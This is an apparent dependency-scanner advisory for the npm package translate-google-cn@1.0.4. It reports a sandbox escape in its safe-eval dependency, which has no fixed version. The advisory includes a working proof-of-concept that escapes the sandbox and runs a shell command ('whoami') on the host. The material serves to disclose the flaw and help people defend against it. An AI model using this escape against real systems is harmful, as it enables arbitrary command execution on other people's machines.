translate-google-cn@1.0.4

Vulnerabilities: 1 via 1 paths
Dependencies: 41
Source: npm

high severity

Sandbox Escape

  • Vulnerable module: safe-eval
  • Introduced through: safe-eval@0.4.1

Detailed paths

  • Introduced through: translate-google-cn@1.0.4 › safe-eval@0.4.1

Overview

safe-eval is a safer version of eval().

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

PoC by Anirudh Anand (for Node 12.13.0):

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

Remediation

There is no fixed version for safe-eval.
